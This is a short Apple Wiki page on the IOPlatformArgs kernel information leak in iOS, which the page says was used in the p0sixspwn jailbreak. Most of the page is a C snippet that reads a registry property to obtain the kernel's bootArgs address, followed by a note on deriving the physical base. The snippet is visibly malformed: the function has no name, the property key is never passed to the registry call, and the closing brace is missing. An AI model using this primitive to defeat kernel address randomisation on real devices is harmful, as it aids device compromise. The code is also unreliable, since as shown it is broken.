IOPlatformArgs leak

From The Apple Wiki
(Redirected from IOPlatfromArgs leak)

The IOPlatformArgs vulnerability leaks the kernel base address. Used in p0sixspwn.

static uint32_t
  CFStringRef parameter = CFSTR("IOPlatformArgs");
  CFDataRef data;
  io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
  if (platformExpert)
    data = IORegistryEntryCreateCFProperty(platformExpert,
                                           kCFAllocatorDefault, 0);
  CFIndex bufferLength = CFDataGetLength(data);  
  UInt8 *buffer = malloc(bufferLength);
  CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer);
  typedef struct {
    uint32_t deviceTreeP;
    uint32_t bootArgs;
    uint32_t zero;
    uint32_t zero_1;
  } platformArgs;
  platformArgs IOPlatformArgs;
  bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));
  return IOPlatformArgs.bootArgs;

Once the attacker knows the virtual base, they can use the virt_to_phys macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug.